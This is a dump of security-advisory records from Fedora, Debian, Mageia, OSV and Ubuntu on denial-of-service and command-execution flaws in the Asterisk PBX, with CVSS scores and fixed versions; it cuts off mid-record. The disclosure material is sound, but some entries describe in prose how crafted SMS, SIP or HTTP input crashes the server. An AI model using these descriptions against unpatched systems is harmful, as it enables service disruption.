"title": "[SECURITY] Fedora 20 Update: asterisk-11.7.0-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-08T07:59:22", "id": "FEDORA:6E56421203", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NH6SJOXUPCA7IUTU5ZDAXY5ERYNPM7YH/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2014-01-08T07:50:47", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.7.0-1.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-08T07:50:47", "id": "FEDORA:307A42200F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NL6GDXU6TYEDRWDOL34OZTF4QDFIJ2BS/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2014-01-08T07:55:08", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: asterisk-11.7.0-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-08T07:55:08", "id": "FEDORA:0DA4021EBA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L3GH3J63NCOURDYZBE2BFUXEYND5JJ7X/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. ", "cvss3": {}, "published": "2013-04-07T00:28:33", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.2.2-1.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-07T00:28:33", "id": "FEDORA:69DC620A83", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/63UN3F2NNQ3XWHJNUSV4P3WC3M23ULYG/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:39:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2749-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 02, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-5641 CVE-2013-5642\n\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-09-02T14:48:20", "type": "debian", "title": "[SECURITY] [DSA 2749-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-02T14:48:20", "id": "DEBIAN:DSA-2749-1:E342B", "href": "https://lists.debian.org/debian-security-announce/2013/msg00160.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T23:38:23", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2605-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 13, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5976 CVE-2012-5977\nDebian Bug : 697230\n\nSeveral vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze9.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-01-13T20:36:39", "type": "debian", "title": "[SECURITY] [DSA 2605-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-13T20:36:39", "id": "DEBIAN:DSA-2605-1:42394", "href": "https://lists.debian.org/debian-security-announce/2013/msg00009.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T23:38:31", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2605-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 19, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5976 CVE-2012-5977\nDebian Bug : 697230 698112 698118\n\nThe security update released in DSA 2605 for Asterisk, caused a\nregression that could lead to crashes. Updated packages have now been\nmade available to correct that behaviour. For reference, the original\nadvisory text follows.\n\nSeveral vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-01-19T14:01:19", "type": "debian", "title": "[SECURITY] [DSA 2605-2] asterisk regression update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-19T14:01:19", "id": "DEBIAN:DSA-2605-2:4DD7B", "href": "https://lists.debian.org/debian-security-announce/2013/msg00013.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T23:24:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2835-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-7100\nDebian Bug : 732355\n\nJan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk. \n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.html\n\nWith the fix for AST-2013-007, a new configuration option was added in \norder to allow the system adminitrator to disable the expansion of \n"dangerous" functions (such as SHELL()) from any interface which is not \nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\n live_dangerously = no\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-01-05T16:38:46", "type": "debian", "title": "[SECURITY] [DSA 2835-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-05T16:38:46", "id": "DEBIAN:DSA-2835-1:D99AD", "href": "https://lists.debian.org/debian-security-announce/2014/msg00003.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "A remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641). A remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642). \n", "cvss3": {}, "published": "2013-08-30T17:36:06", "type": "mageia", "title": "Updated asterisk package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-30T17:36:06", "id": "MGASA-2013-0266", "href": "https://advisories.mageia.org/MGASA-2013-0266.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated asterisk packages fix security vulnerability: Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message (CVE-2013-7100). The updated packages has been upgraded to the 11.7.0 version which resolves various upstream bugs and is not vulnerable to this issue. \n", "cvss3": {}, "published": "2013-12-23T17:15:47", "type": "mageia", "title": "Updated asterisk packages fix CVE-2013-7100\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-23T17:15:47", "id": "MGASA-2013-0384", "href": "https://advisories.mageia.org/MGASA-2013-0384.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated asterisk packages fix security vulnerabilities: In Asterisk before 11.6.1, a 16 bit SMS message that contains an odd message length value will cause the message decoding loop to run forever. The message buffer is not on the stack but will be overflowed resulting in corrupted memory and an immediate crash (CVE-2013-7100). In Asterisk before 11.6.1, external control protocols, such as the Asterisk Manager Interface, often have the ability to get and set channel variables; this allows the execution of dialplan functions. Reading the SHELL() function can execute arbitrary commands on the system Asterisk is running on. Writing to the FILE() function can change any file that Asterisk has write access to. When these functions are executed from an external protocol, that execution could result in a privilege escalation (AST-2013-007). In Asterisk before 11.8.1, sending a HTTP request that is handled by Asterisk with a large number of Cookie headers could overflow the stack. You could even exhaust memory if you sent an unlimited number of headers in the request (CVE-2014-2286). In Asterisk before 11.8.1, an attacker can use all available file descriptors using SIP INVITE requests. Each INVITE meeting certain conditions will leak a channel and several file descriptors. The file descriptors cannot be released without restarting Asterisk which may allow intrusion detection systems to be bypassed by sending the requests slowly (CVE-2014-2287). \n", "cvss3": {}, "published": "2014-04-15T18:22:45", "type": "mageia", "title": "Updated asterisk packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100", "CVE-2014-2286", "CVE-2014-2287"], "modified": "2014-04-15T18:22:45", "id": "MGASA-2014-0171", "href": "https://advisories.mageia.org/MGASA-2014-0171.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:09:45", "description": "\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "edition": 1, "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "osv", "title": "asterisk - several", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2022-08-10T07:09:04", "id": "OSV:DSA-2749-1", "href": "https://osv.dev/vulnerability/DSA-2749-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-21T08:30:12", "description": "\nSeveral vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\n\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "edition": 1, "cvss3": {}, "published": "2013-01-19T00:00:00", "type": "osv", "title": "asterisk - several issues", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2022-07-21T05:47:52", "id": "OSV:DSA-2605-1", "href": "https://osv.dev/vulnerability/DSA-2605-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T07:06:26", "description": "\nJan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\n\nAn additional change was backported, which is fully described in\n<http://downloads.asterisk.org/pub/security/AST-2013-007.html>\n\n\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous functions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\n\n\n```\nlive\\_dangerously = no\n```\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "edition": 1, "cvss3": {}, "published": "2014-01-05T00:00:00", "type": "osv", "title": "asterisk - buffer overflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2022-08-10T07:06:07", "id": "OSV:DSA-2835-1", "href": "https://osv.dev/vulnerability/DSA-2835-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:25:45", "description": "main/http.c in the HTTP server in Asterisk Open Source 1.8.x before\n1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk\n1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones\nbefore 10.12.2-digiumphones does not properly restrict Content-Length\nvalues, which allows remote attackers to conduct stack-consumption attacks\nand cause a denial of service (daemon crash) via a crafted HTTP POST\nrequest. NOTE: this vulnerability exists because of an incorrect fix for\nCVE-2012-5976.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=704114>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | This is due to an incorrect fix for CVE-2012-5976\n", "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2686", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-04-01T00:00:00", "id": "UB:CVE-2013-2686", "href": "https://ubuntu.com/security/CVE-2013-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x\nbefore 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified\nAsterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and\nAsterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows\nremote attackers to cause a denial of service (NULL pointer dereference,\nsegmentation fault, and daemon crash) via an invalid SDP that defines a\nmedia description before the connection description in a SIP request.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5642", "href": "https://ubuntu.com/security/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source\n1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1\nand Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before\n11.2-cert2 allows remote attackers to cause a denial of service (NULL\npointer dereference, segmentation fault, and daemon crash) via an ACK with\nSDP to a previously terminated channel. NOTE: some of these details are\nobtained from third party information.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5641", "href": "https://ubuntu.com/security/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:27:03", "description": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x\nbefore 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk\nDigiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous\ncalls are enabled, allow remote attackers to cause a denial of service\n(resource consumption) by making anonymous calls from multiple sources and\nconsequently adding many entries to the device state cache.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697230>\n", "cvss3": {}, "published": "2013-01-04T00:00:00", "type": "ubuntucve", "title": "CVE-2012-5977", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5977"], "modified": "2013-01-04T00:00:00", "id": "UB:CVE-2012-5977", "href": "https://ubuntu.com/security/CVE-2012-5977", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:27:04", "description": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x\nbefore 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified\nAsterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones\n10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to\ncause a denial of service (daemon crash) via TCP data using the (1) SIP,\n(2) HTTP, or (3) XMPP protocol.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697230>\n", "cvss3": {}, "published": "2013-01-04T00:00:00", "type": "ubuntucve", "title": "CVE-2012-5976", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-01-04T00:00:00", "id": "UB:CVE-2012-5976", "href": 